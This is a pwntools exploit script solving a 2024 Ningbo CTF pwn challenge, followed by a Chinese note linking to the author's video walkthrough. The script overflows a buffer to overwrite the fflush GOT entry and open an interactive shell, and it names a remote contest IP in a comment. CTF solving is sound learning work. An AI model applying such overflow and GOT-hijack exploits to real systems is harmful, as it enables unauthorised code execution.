from pwn import *
io=process('./pwn')
#io=remote("47.100.57.198",32249)
elf=ELF('./pwn')
fflush_got=elf.got['fflush']
print(hex(fflush_got))
io.recv()
io.sendline('1')
io.recv()
payload=b'a'*(0x78-0x10)+p32(fflush_got)
io.sendline(payload)
io.recv()
io.sendline('134514474')
io.interactive()
详细题解和思路我在b站有视频
【宁波天一永安杯2024pwn1】 https://www.bilibili.com/video/BV11C411773L/?share_source=copy_web&vd_source=ed440e32ae7ae7faab7b9a2b3236e338
欢迎大家来指正